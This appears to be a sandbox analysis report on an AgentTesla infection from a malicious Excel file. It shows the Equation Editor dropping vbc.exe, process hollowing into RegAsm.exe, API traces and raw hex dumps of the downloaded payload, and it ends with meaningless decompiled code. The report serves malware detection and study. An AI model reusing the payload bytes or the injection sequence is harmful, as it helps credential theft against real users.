00 00 0a 02 7b 62 00 00 0a 6f 5a 00 00 0a 28 5e 00 00 0a 2a 2e 73 6f 00 00 0a 80 70 00 00 0a 2a 1e 03 6f 71 00 00 0a 2a 56 02 7b 11 00 00 04 6f 64 00 00 0a 03 28 12 00 00 2b 16 fe 01 2a 4a 02 7b 12 00 00 04 6f 31 00 00 0a 03 6f 76 00 00 0a 2a 4a 03 02 7b 13 00 00 04 6f
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELq_j @ @|OB H.texti j `.rsrcBl@@.relocp@BHxqwabdcefghijklmnprqstuvwzyx0123456789ABCDEFGHIJKLMNQPRTSVUWXYZ6(o*B(o&*2(t*(&*2to*F~~(**(*(((((o*&o*(*(*.r)p*6{b(^*o{a{c{boZ(^*.sop*oq*V{od(+*J{o1ov*J{o
                                              Nov 20, 2020 13:47:40.805485964 CET3INData Raw: 71 00 00 0a 28 5e 00 00 0a 2a 2e 73 33 00 00 06 80 14 00 00 04 2a 2e 73 38 00 00 06 80 16 00 00 04 2a 0a 03 2a 1e 02 7b 1a 00 00 04 2a 22 02 03 7d 1a 00 00 04 2a 1e 02 7b 1b 00 00 04 2a 22 02 03 7d 1b 00 00 04 2a 56 02 28 07 00 00 0a 02 03 28 40
                                              Data Ascii: q(^*.s3*.s8**{*"}*{*"}*V((@(B*Jo?{(^*RoA{oA*.s*o?**("+*o*.s*2o(*6{,(^*z|-(.o*6
                                              Nov 20, 2020 13:47:40.805526972 CET4INData Raw: 7d c8 00 00 04 2a 1e 02 7b c9 00 00 04 2a 22 02 03 7d c9 00 00 04 2a 1e 02 7b ca 00 00 04 2a 22 02 03 7d ca 00 00 04 2a 1e 02 7b cb 00 00 04 2a 22 02 03 7d cb 00 00 04 2a 1e 02 7b cc 00 00 04 2a 22 02 03 7d cc 00 00 04 2a 1e 02 7b cd 00 00 04 2a
                                              Data Ascii: }*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*0(rpo,(,o**0M((s&s
                                              Nov 20, 2020 13:47:40.805566072 CET6INData Raw: 09 06 fe 06 2e 00 00 06 73 3a 00 00 0a 6f 3b 00 00 0a 07 06 fe 06 2f 00 00 06 73 43 00 00 0a 28 09 00 00 2b 2a 00 00 00 13 30 02 00 28 00 00 00 0d 00 00 11 d0 03 00 00 1b 28 44 00 00 0a 28 29 00 00 0a 28 0a 00 00 2b 26 28 0b 00 00 2b 28 01 00 00
                                              Data Ascii: .s:o;/sC(+*0((D()(+&(+(+(*0(D()(+s/(+sFo,oG+2oHt(+,oI+oJoK-u,oQ(
                                              Nov 20, 2020 13:47:40.923609972 CET7INData Raw: 06 67 00 00 0a 73 68 00 00 0a 28 10 00 00 2b 28 11 00 00 2b 0c 08 6f 55 00 00 0a 28 56 00 00 0a 0d 02 7b 6a 00 00 0a 06 7b 62 00 00 0a 6f 50 00 00 0a 6f 57 00 00 0a 13 04 09 11 04 6f 58 00 00 0a 2c 1f 09 11 04 6f 59 00 00 0a 13 06 08 02 7b 6b 00
                                              Data Ascii: gsh(+(+oU(V{j{boPoWoX,oY{koT+d{lrp%{m.%{c{boZ%oUo%{j{boPoW(Ro_*06{od(r(+,
                                              Nov 20, 2020 13:47:40.923664093 CET9INData Raw: 39 67 04 00 00 07 6f a2 00 00 0a 13 08 00 2b 20 11 08 6f a3 00 00 0a 13 09 08 11 09 6f 57 00 00 0a 09 73 44 00 00 06 6f a4 00 00 0a 09 17 58 0d 11 08 6f 4b 00 00 0a 2d d7 de 0c 11 08 2c 07 11 08 6f 06 00 00 0a dc 08 7e a5 00 00 0a 25 2d 17 26 7e
                                              Data Ascii: 9go+ ooWsDoXoK-,o~%-&~s%(+~%-&~s%(+~%-&~s%(+~%-&~s%(+o8s
                                              Nov 20, 2020 13:47:40.923722029 CET10INData Raw: 0a 0c 07 28 1f 00 00 2b 06 fe 06 e0 00 00 0a 73 e1 00 00 0a 28 20 00 00 2b 28 21 00 00 2b 0d 03 13 04 2b 46 09 11 04 6f e2 00 00 0a 6f e3 00 00 0a 13 05 08 6f 31 00 00 0a 11 05 09 11 04 6f e2 00 00 0a 6f e4 00 00 0a 28 e5 00 00 0a 25 2d 0e 26 09
                                              Data Ascii: (+s( +(!++Fooo1oo(%-&ooo&Xo-o+joo+;oooo%-&~SoXo-o,ooK-
                                              Nov 20, 2020 13:47:40.923767090 CET11INData Raw: 25 00 00 2b 0c 7e ca 00 00 0a 0d 03 2d 03 14 2b 12 03 06 fe 06 08 01 00 0a 73 40 00 00 0a 28 26 00 00 2b 13 04 11 04 28 cf 00 00 0a 16 fe 01 2c 07 06 7b 07 01 00 0a 0d 12 02 28 02 01 00 0a 16 fe 01 2c 09 7e ca 00 00 0a 13 07 2b 36 12 02 28 03 01
                                              Data Ascii: %+~-+s@(&+(,{(,~+6(o,{(^,+~*0( oooooo*0'!o(ooso*0
                                              Nov 20, 2020 13:47:40.923810959 CET13INData Raw: 00 00 00 07 00 00 00 e8 00 00 00 0a 01 00 00 16 0a dd 2e 02 00 00 02 15 7d 46 01 00 0a 02 02 7b 4b 01 00 0a 75 1f 00 00 01 7d 4c 01 00 0a 02 14 7d 4d 01 00 0a 02 7b 4c 01 00 0a 14 fe 03 2c 79 02 73 2f 00 00 0a 7d 4d 01 00 0a 02 02 7b 4c 01 00 0a
                                              Data Ascii: .}F{Ku}L}M{L,ys/}M{Lo&}N+.{NoH}O{M{OoWo_}O{NoK-{Nu,o}N{P,=sQ%rCpoR%rpoS%oT}U}F
                                              Nov 20, 2020 13:47:40.923852921 CET14INData Raw: 00 0a 02 18 7d 6c 01 00 0a 17 0a de 07 02 28 84 01 00 0a dc 06 2a 00 00 41 1c 00 00 04 00 00 00 00 00 00 00 11 02 00 00 11 02 00 00 07 00 00 00 00 00 00 00 13 30 02 00 5b 00 00 00 2c 00 00 11 02 7b 6c 01 00 0a 1f fe 33 18 02 7b 6d 01 00 0a 28 47
                                              Data Ascii: }l(*A0[,{l3{m(G3}l+s{}{}q{}w{}s*0+-(soooo&*0.rp(#o
                                              Nov 20, 2020 13:47:40.923892975 CET16INData Raw: a6 01 00 0a 02 14 7d cc 01 00 0a 16 0a dd 0a 01 00 00 02 02 7b cc 01 00 0a 6f 48 00 00 0a 7d cd 01 00 0a 02 28 2f 00 00 2b 7d ce 01 00 0a 02 02 7b cd 01 00 0a 6f 28 00 00 0a 7d cf 01 00 0a 02 02 7b cf 01 00 0a 1f 14 6f d0 01 00 0a 7d d1 01 00 0a
                                              Data Ascii: }{oH}(/+}{o(}{o}}8{{}{o}{{o}{{o{{oT}}}{X}{{i?


                                              HTTPS Packets

                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                              Nov 20, 2020 13:49:16.885310888 CET23.21.42.25443192.168.2.2249168CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Jan 24 01:00:00 CET 2018 Wed Feb 12 01:00:00 CET 2014 Tue Jan 19 01:00:00 CET 2010Sun Jan 24 00:59:59 CET 2021 Mon Feb 12 00:59:59 CET 2029 Tue Jan 19 00:59:59 CET 2038771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                              CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Feb 12 01:00:00 CET 2014Mon Feb 12 00:59:59 CET 2029
                                              CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Jan 19 01:00:00 CET 2010Tue Jan 19 00:59:59 CET 2038

                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: EXCEL.EXE PID: 2016 Parent PID: 584

                                              General

                                              Start time:13:46:44
                                              Start date:20/11/2020
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13f0c0000
                                              File size:27641504 bytes
                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: EQNEDT32.EXE PID: 2492 Parent PID: 584

                                              General

                                              Start time:13:47:04
                                              Start date:20/11/2020
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: vbc.exe PID: 2708 Parent PID: 2492

                                              General

                                              Start time:13:47:09
                                              Start date:20/11/2020
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\vbc.exe'
                                              Imagebase:0x1010000
                                              File size:619008 bytes
                                              MD5 hash:C11D6124EE0522C7AB71D20CF3474DC0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2167794246.0000000000462000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2170414969.0000000004127000.00000004.00000001.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: RegAsm.exe PID: 2452 Parent PID: 2708

                                              General

                                              Start time:13:47:17
                                              Start date:20/11/2020
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Imagebase:0xc0000
                                              File size:64672 bytes
                                              MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: RegAsm.exe PID: 2344 Parent PID: 2708

                                              General

                                              Start time:13:47:17
                                              Start date:20/11/2020
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Imagebase:0xc0000
                                              File size:64672 bytes
                                              MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: RegAsm.exe PID: 2364 Parent PID: 2708

                                              General

                                              Start time:13:47:17
                                              Start date:20/11/2020
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Imagebase:0xc0000
                                              File size:64672 bytes
                                              MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2360877305.00000000029FF000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: vbc.exe PID: 2708 Parent PID: 2492 vbc.exeCOMMON

                                                Executed Functions

                                                Function 003F01CB, Relevance: 517.4, Strings: 413, Instructions: 1134COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167777694.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                                                Similarity
                                                • API ID: Section$OpenView
                                                • String ID: .dll$.dll$.dll$2.dl$2.dl$2.dl$2.dl$32.d$Begi$Clas$CoCr$CoIn$Cont$Cont$Crea$Crea$Crea$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$DefW$EndP$Ex$ExW$Expa$File$Fill$Find$Free$GetM$GetP$GetS$Hash$Inst$IsWo$KERNEL32.DLL$Key$Key$KeyP$LdrG$LdrL$Libr$Load$Load$Lock$Memo$Mess$Mess$Muta$NtAd$NtAl$NtCl$NtCo$NtCr$NtCr$NtCr$NtCr$NtCr$NtDe$NtEn$NtFr$NtGe$NtMa$NtOp$NtOp$NtOp$NtOp$NtOp$NtOp$NtPr$NtQu$NtQu$NtQu$NtQu$NtQu$NtRe$NtRe$NtRe$NtSe$NtSe$NtTe$NtWr$NtWr$Ole3$Para$Post$Priv$Proc$Quit$Rect$Regi$Reso$Reso$Reso$Reso$RtlC$RtlC$RtlC$RtlF$RtlS$RtlZ$Sect$Show$Size$Thre$Thre$Thre$Thre$Tran$User$User$W$W$Wind$ZwCr$ZwRo$ZwUn$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Ole$\adv$\ker$\ntd$\use$a$ad$ad$ad$adEx$adFi$adVi$age$ageB$aint$alMe$alue$ance$ansa$api3$aryA$ash$at$ateH$ateK$ateP$ath$cW$ce$cess$cess$ckTr$ctio$ctio$ddre$ddre$dll$dll$dll$dvap$eA$eFil$eNam$ePro$eUse$eUse$ead$ease$eate$eate$eate$eate$eate$eate$eate$ecti$ecti$eeVi$emor$en$en$enFi$enKe$enMu$enPr$enPr$enSe$erne$eroM$eryI$eryI$eryS$eryS$eryV$esTo$ess$et$etCu$etPr$ext$extW$ey$ey$fSec$hDat$i32.$iewO$ile$ileg$indo$ings$ion$ion$irtu$iteF$iteV$itia$iveK$just$ken$kernel32.dll$l$l$l$l$l32.$lMem$lMem$lMem$layE$le$le$le$le32$lenW$lize$ll$ll$ll$ll.d$llba$loca$ls32$ls32$ls32$ls32$ls32$ls\O$ls\a$ls\k$ls\n$ls\u$lstr$mInf$mInf$mapV$mati$mati$mbstowcs$memc$mems$mete$mory$mp$n$n$nPai$ndEn$ndow$nel3$nfor$nfor$nmen$nsac$nt$nt$ntin$o$oadD$oced$oces$oces$oces$oces$odul$ofRe$ombs$on$on$onFi$onPr$orma$orma$ory$ory$ory$ose$otec$ow$oxA$pVie$py$py$r32.$rPro$rThr$reat$reat$reat$rent$rmin$rocA$roce$roce$rren$rs$rtua$rtua$rtua$ry$rypt$s$s$sTok$sW$sW$sact$ser3$sour$ss$ss$ss$ss$ster$strlenuser32.dlladvapi32.dll$sume$tAcq$tCon$tCon$tCre$tCur$tDec$tDer$tDes$tDes$tHas$tRel$tStr$tTra$tVal$tVir$tant$tdll$teMu$tePr$teVi$teWi$texW$text$text$tion$tion$tion$tion$troy$troy$tual$ue$ueKe$uire$umer$urce$urce$urce$urce$ureA$viro$w64P$wOfS$wPro$wcsc$wcsc$wcsc$wcsl$wcst$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$xecu$y$y$y$yste$yste
                                                • API String ID: 2380476227-789266925
                                                • Opcode ID: 787866d0769b518b38cf3cef9c8e0732aeba9ebab195fb7289df72886f22b9db
                                                • Instruction ID: 28cab4b3456d576ab00f501818cfba62ce7eb1f37bdf32ae341e191f5caa1cf3
                                                • Opcode Fuzzy Hash: 787866d0769b518b38cf3cef9c8e0732aeba9ebab195fb7289df72886f22b9db
                                                • Instruction Fuzzy Hash: 54D2BFB1C0526D8ACF22DFA58D85BDEBBB8BF15700F1041DAD248AB216DB319B84CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 003F1C09, Relevance: 16.7, APIs: 11, Instructions: 225nativethreadprocessCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 003F1CB7
                                                • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 003F1CDC
                                                • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 003F1CF6
                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 003F1D41
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 003F1D66
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 003F1DA9
                                                • NtTerminateProcess.NTDLL(?,00000000), ref: 003F1DB7
                                                • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 003F1DC2
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 003F1E36
                                                • NtSetContextThread.NTDLL(?,00010007), ref: 003F1E74
                                                • NtResumeThread.NTDLL(?,00000000), ref: 003F1E86
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167777694.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                                                Similarity
                                                • API ID: Section$ProcessView$CreateMemoryThreadVirtual$ContextInformationQueryReadResumeTerminateUnmapWrite
                                                • String ID:
                                                • API String ID: 2175245719-0
                                                • Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                                • Instruction ID: d14af98d2cdac7e65d64eecc816d4a5868e1d7211ce2e024e019aa259f8ca77d
                                                • Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                                • Instruction Fuzzy Hash: 3491D07190024DEBDF219FA5DC89EEEBBB8FF49705F004059FA09EA150D731AA94DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 003F00AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtOpenSection.NTDLL(?,0000000C,?), ref: 003F0199
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 003F01B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167777694.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                                                Similarity
                                                • API ID: Section$OpenView
                                                • String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
                                                • API String ID: 2380476227-2634024955
                                                • Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                                • Instruction ID: 0c3c0a931b335c7ecc759fe18c519539e7f27bd4d4c74ca8ba05edb64cf1c5ae
                                                • Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                                • Instruction Fuzzy Hash: 153116B1D0025DABCB15CFD8C981AEEBBB8FF08750F10415AE614EB251E7749A05CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001B1079, Relevance: 1.5, APIs: 1, Instructions: 244memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 001B1300
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167698166.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: dd6b7ee67ad30d633716f630bb412282b27f60d9cd931425808471bb90e3ce2c
                                                • Instruction ID: f0ac134c360ad82e86b66d59c7d7d2722d940f35f4bbd0d00ac21800d0e2e9de
                                                • Opcode Fuzzy Hash: dd6b7ee67ad30d633716f630bb412282b27f60d9cd931425808471bb90e3ce2c
                                                • Instruction Fuzzy Hash: 4E81F4316002049FCB14DBB8C8547AFBBF6AF89314F558969D515DB392DB31DC46CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001B1298, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 001B1300
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167698166.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: b078d53c100a10b0972b0d17e9fc4ac8b35835661305d9f1baca752624698ac4
                                                • Instruction ID: e8f666822c38ce5dc63c6bc37784b4e6174908baeb3b8c3d7aaab2a4bf8295cb
                                                • Opcode Fuzzy Hash: b078d53c100a10b0972b0d17e9fc4ac8b35835661305d9f1baca752624698ac4
                                                • Instruction Fuzzy Hash: 3311E6B59002099FCB10DF9AD844BDEFBF8FF89324F24881AE558A7610D775A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0014D0EC, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167673653.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8466346696b0c5bce83bc2142735664541085aea514254482005ab8207df942
                                                • Instruction ID: 41f133c5cbe8525dc8eb384e72003dc4a7fba9a88e0cb84fb8e677d385f5db0c
                                                • Opcode Fuzzy Hash: f8466346696b0c5bce83bc2142735664541085aea514254482005ab8207df942
                                                • Instruction Fuzzy Hash: 452104B5604204EFDF04DF50E980B16BBA5FB84B14F24C96DEC094B366C736D806CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0014D0E7, Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167673653.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
                                                • Instruction ID: d0c611f3bdc3552635d9817a6eac7630dd2aff0be0fbcabb0563947f56d10897
                                                • Opcode Fuzzy Hash: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
                                                • Instruction Fuzzy Hash: AF118B75504280DFDF05CF10E984B15BBA1FB84714F28C6AADC094B666C33AD85ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0013D041, Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167662351.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d92dedd859ef32b4261084a600bc76da26fde5a1f96bc882bde64e490f002207
                                                • Instruction ID: 88e3e534ea9b7f7e552e42d51eaf63ac82ab295270cbb8b60c6f2db1116d386d
                                                • Opcode Fuzzy Hash: d92dedd859ef32b4261084a600bc76da26fde5a1f96bc882bde64e490f002207
                                                • Instruction Fuzzy Hash: FD01A7314043449BE7288B65E884B6BBFD8EF81B24F188556FD495F283D379DC45CAB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0013D040, Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167662351.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6750046eba0d90787452da2dd458de1b8210c4e3d41c11db227f1e10717d6f99
                                                • Instruction ID: 2d458089ef720fb8d32296542d3f05c600db3bb74c1e518b14182ed1bc41e275
                                                • Opcode Fuzzy Hash: 6750046eba0d90787452da2dd458de1b8210c4e3d41c11db227f1e10717d6f99
                                                • Instruction Fuzzy Hash: D6F0CD32404244AFEB148E15E888B66FFE8EF91724F28C45AEC085F283C3799C44CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0109F5C1, Relevance: .6, Instructions: 623COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 17%
                                                			E0109F5C1(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed char _t308;
				void* _t310;
				signed int _t311;
				signed int _t312;
				signed int _t316;
				signed int _t327;
				intOrPtr* _t328;
				signed int _t336;
				signed int _t337;
				signed int _t339;
				signed char _t341;
				signed int _t342;
				signed int _t343;
				signed char _t344;
				signed int _t348;
				signed int _t349;
				void* _t352;
				signed int _t353;
				intOrPtr* _t354;
				intOrPtr* _t355;
				signed int _t356;
				signed int _t357;
				signed int _t359;
				signed int _t360;
				signed char _t361;
				signed int _t362;
				signed char _t363;
				signed char _t365;
				signed char _t366;
				signed int _t367;
				signed int* _t368;
				signed int _t369;
				signed char _t372;
				signed char _t373;
				signed char _t374;
				signed char _t375;
				signed char _t376;
				signed char _t377;
				signed char _t378;
				signed char _t379;
				signed int _t380;
				signed int* _t381;
				signed int _t382;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed char _t390;
				signed int _t391;
				signed char _t392;
				signed int _t393;
				signed int _t394;
				signed char _t397;
				signed int _t398;
				signed int _t399;
				char* _t400;
				void* _t401;
				signed char _t402;
				signed int _t404;
				signed int _t406;
				void* _t407;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t412;
				intOrPtr* _t413;
				void* _t414;
				void* _t415;
				signed int _t417;
				intOrPtr* _t420;
				signed int _t423;
				signed int _t424;
				void* _t425;
				void* _t426;
				void* _t428;
				signed int* _t429;
				intOrPtr* _t434;
				intOrPtr* _t435;
				void* _t436;
				intOrPtr* _t438;
				signed int _t441;
				signed int _t443;
				signed char _t445;
				signed char _t447;
				signed int _t448;
				signed int _t449;
				signed char _t450;
				signed int _t451;
				signed int _t453;
				signed int* _t454;
				signed int _t460;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				void* _t467;
				signed int _t469;
				signed int _t470;

				_t308 = __eax | 0xffffffff9fe00603;
				asm("sbb ecx, [0xb8000102]");
				_pop(ds);
				asm("in al, dx");
				asm("adc eax, [esi]");
				 *((intOrPtr*)(__esi + 0x113ec1b)) =  *((intOrPtr*)(__esi + 0x113ec1b)) + __ecx;
				 *__edx =  *__edx + _t308;
				asm("adc eax, [esi]");
				_t310 = (_t308 & __ecx) + (_t308 & __ecx);
				asm("sbb ebp, esp");
				asm("adc eax, [ecx]");
				 *((intOrPtr*)(_t464 + 0x10eab1e)) =  *((intOrPtr*)(_t464 + 0x10eab1e)) + _t310;
				 *((intOrPtr*)(_t464 + 0x101d91f)) =  *((intOrPtr*)(_t464 + 0x101d91f)) + __ecx;
				_t409 = __ecx + __ecx;
				_pop(ds);
				asm("scasd");
				 *_t409 =  *_t409 + _t310;
				_t311 = _t310 + _t409;
				_pop(ds);
				asm("scasd");
				 *_t409 =  *_t409 + _t311;
				_pop(ds);
				asm("scasd");
				 *_t409 =  *_t409 + _t311;
				 *((intOrPtr*)(__esi + 0x16)) =  *((intOrPtr*)(__esi + 0x16)) + _t311;
				_t312 = _t311 | 0x17000102;
				_pop(ss);
				asm("scasd");
				 *_t409 =  *_t409 + _t312;
